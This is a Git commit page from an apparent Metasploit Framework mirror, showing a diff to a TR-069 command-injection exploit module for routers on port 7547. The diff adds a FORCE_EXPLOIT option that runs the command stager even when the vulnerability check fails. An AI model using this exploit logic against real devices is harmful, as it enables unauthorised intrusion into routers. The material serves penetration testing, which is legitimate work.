infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add a FORCE_EXPLOIT option for @FireFart

bug/bundler_fix
Tod Beardsley 2016-11-29 16:37:13 -06:00
parent 57d156a5e2
commit 08b9684c1a
No known key found for this signature in database
GPG Key ID: 08B5B91DC85943FE
1 changed files with 10 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
View File

@ -57,6 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(7547), # TR-069 CWMP port for SOAP/XML commands
OptBool::new('FORCE_EXPLOIT', [false, 'Force an attempt even if the check fails', nil])
], self.class)
end
@ -116,14 +117,18 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
print_status("Trying to access the device...")
print_status("#{peer} - Checking...")
unless check == Exploit::CheckCode::Appears
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
if check == Exploit::CheckCode::Appears
print_status("#{peer} - Appears vulnerable")
execute_cmdstager({:flavor => :echo})
elsif datastore['FORCE_EXPLOIT']
print_status("#{peer} - Doesn't appear vulnerable, but trying anyway.")
execute_cmdstager({:flavor => :echo})
else
fail_with(Failure::Unknown, "#{peer} - Failed to access the device")
end
print_status("Exploiting...")
execute_cmdstager({:flavor => :echo})
end
end